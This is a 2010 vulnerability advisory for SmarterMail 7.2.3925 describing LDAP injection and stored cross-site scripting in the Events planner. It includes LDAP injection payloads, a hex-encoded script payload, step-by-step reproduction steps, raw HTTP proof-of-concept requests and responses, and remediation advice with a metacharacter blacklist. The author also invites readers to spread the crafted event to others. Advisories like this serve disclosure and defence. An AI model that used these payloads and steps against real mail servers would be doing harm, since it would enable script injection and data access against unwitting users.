########################################################################
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
# Date: 2010-10-01
# Author : David Hoyt (sqlhacker) – Hoyt LLC
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Dork : insite: SmarterMail Enterprise 7.2
# Bug : LDAP Injection + Cross Site Scripting (STORED)
# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2
# Uncoordinated Disclosure
########################################################################

ABSTRACT
--------------------------
It is important for application developers to penetration test
their products prior to release in order to find potential vulnerabilities
and correct them before fraudsters exploit them.

DISCLOSURE PURPOSE
--------------------------
Applications for wide-scale deployment must be delivered with an exploit
surface that is manageable.

Developers failing to properly screen applications prior to release are at
risk of uncoordinated disclosure.

SECURITY COMMENTS
--------------------------
Server Application developers should explicitly be detailing the exploit
surface
modeling performed on an application as part of the software development
lifecycle
prior to and as part of a candidate release.

System Admins need to take a trust-no-one approach when installing Server
and Client Applications for wide-scale deployment.

ENGAGEMENT TOOLS
--------------------------
I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,
NeXpose, XSS_Rays,
FuzzDB as a baseline set of engagement tools that are being used to perform
this analysis.

This is manual testing.

DISCUSSION AND ANALYSIS
--------------------------
SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have
addressed a number of
issues identified in CVE's 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425
and
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486

There were a number of Private Advisories provided to Hoyt LLC Clients that
were not disclosed to the public. It was our assumption that
the level of detail and specificity would have resulted in a thourough
scrubbing of any patches and release candidates.

There are additional exploits to disclose that use a manual, multi-step
process to confirm with picture proof.

This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS
Injection vulnerabilities found in SmarterMail 7.x (7.2.3925).
Additional advisories will be released as we develop a bullet proof audit
trail.

Further advisories will focus on security by obscurity in SmarterMail.

My prior work focused on the URL/Parameter Combos that would deliver a Cross
Site Scripting (STORED) exploit.

My review seeks to focus on the identified URL/Param combos in SmarterMail
7.1 that were found to be vulnerable but not disclosed to the public
and only available in private advisories to our clients and partners.


AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES


EXPLOIT #1
--------------------------
LDAP injection and resulting STORED Cross Site Scripting in Events Planner -
SmarterMail 7.x (7.2.3925)

Summary
Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmEmptyPreviewOuter.aspx
        Multiple Related URL/Parameters (available in private advisory)

Issue detail
The type parameter is vulnerable to LDAP injection attacks.

The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each
submitted in the type parameter. These two requests resulted in different
responses, indicating that the input may be being incorporated into a
disjunctive LDAP query in an unsafe manner.

Issue Background
-----------------------
LDAP injection arises when user-controllable data is copied in an unsafe way
into an LDAP query that is performed by the application. If an attacker can
inject LDAP metacharacters into the query, then they can interfere with the
query's logic. Depending on the function for which the query is used, the
attacker may be able to retrieve sensitive data to which they are not
authorised, or subvert the application's logic to perform some unauthorised
action.

Note that automated difference-based tests for LDAP injection flaws can
often be unreliable and are prone to false positive results.

The author has manually reviewed the reported requests and responses and
confirmed a vulnerability is present.

All the work presented is manual recon and analysis using the tools listed.


Step by Step Process
---------------------------------------------------

The steps to create the exploit as as follows:

-Obtain an end-user SmarterMail 7.x (7.2.3925)
-Login to WebMail, Click Events

Note - The XSS attack payload can be delivered by creating an Event Group or
an Event Name.

My example will create a new event. I know that SmarterMail does some data
sanitization, so I need to test various encoding schemes to get around the
limited sanity checking.

To make this easy to follow along, use URL http://ha.ckers.org/xss.html for
our encoding calculator so the average Joe can leverage this exploit
example.

I want to make a simple test to confirm if the URL/Parameters are vulnerable
in the Event Planner of SmarterMail 7.x (7.2.3925).
I'll use a known malicious payload example. Using the encoding calculator, I
input <\\\/script>alert(0x000170)<\\/script>
and for the HEX Value Stored Cross Site Scripting exploit I want to create.

The result is
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E,
there is your example exploit for Stored XSS.

Take the result and paste it into the new event name (exploit) you want to
create and e-mail around to all your colleages and friends and blog about...

Click submit and refresh the screen, here is what I "received" for a
payload. I provide 2 examples of URL/Parameter manipulation that result in
an event being created.

** Author Note.. the Blogger parser isn't very good about making me escape
the nasty XSS below.. so I have to edit the post so readers don't get
XSS'd.. Pictures are a part of the exploit surface model, I also like to
post conclusive, picture proof of an exploit.

The picture(s) below provide conclusive evidence of Cross Site Scripting
(STORED) delivered via LDAP Injection.


Stored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x
(7.2.3925)
LDAP Injection to leverage an XSS attack utilizing the event planner
features of SmarterMail 7.x (7.2.3925)


Stored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x
(7.2.3925)
LDAP Injection to leverage an XSS attack utilizing the event planner
features of SmarterMail 7.x (7.2.3925)

The implication here is that SmarterMail isn't defending against HEX Value
malicious payloads. This is a "critical" exploit finding confirmed in
SmarterMail 7.x (7.2.3925).
You can keep testing with Decimal or Base 64 and produce results equal to
and likely greater than what I am showing here in public, emphasis on
greater than what I am showing.


Issue Remediation
-------------------
If possible, applications should avoid copying user-controllable data into
LDAP queries. If this is unavoidable, then the data should be strictly
validated to prevent LDAP injection attacks. In most situations, it will be
appropriate to allow only short alphanumeric strings to be copied into
queries, and any other input should be rejected. At a minimum, input
containing any LDAP metacharacters should be rejected; characters that
should be blocked include ( ) ; , * | & = and whitespace.


EXPLOIT Proof of Concept {PoC} - DETAILS
--------------------------------------------

Request 1
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-ms-application, application/x-ms-xbap,
application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.smartermail.site:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;
STTTState=;
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}



Response 1
HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5204


...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage)
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a');
});
Sys.Application.initialize();
$(function() {
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');
});
//]]>
</script>
</form>
</body>
</html>



Request 2
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-ms-application, application/x-ms-xbap,
application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.smartermail.site:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;
STTTState=;
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}



Response 2
HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5247


...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage)
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a');
});
Sys.Application.initialize();
$(function() {
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');
});
//]]>



EXPLOIT #2
--------------------------
Directory Creation by Fuzzing that results in a STORED Cross Site Scripting
attack.

This portion of the research focused on creating direcories that would evade
the current filtering techniques used my SmarterMail to prevent OS Injection



WORKAROUNDS
--------------------------
Specifically, URL filtering should be employed against the malicious query
strings.



REMEDIATION SOLUTION
------------------------

I'm pushing a quick update to my clients now on this LDAP Injection / Stored
XSS issue..
Our group is studying a remediation solution or additional workarounds that
will be posted at this URL.

Calender and Event functionality is not straightforward to implement
securely.
Some recommendations to consider in the design of this functionality
include:

Validating Input and a blacklist of strings to hinder this style of attack.

There is more to the story.. since I'm just screening applications for
clients, I am pushing out the info as I confirm it manually.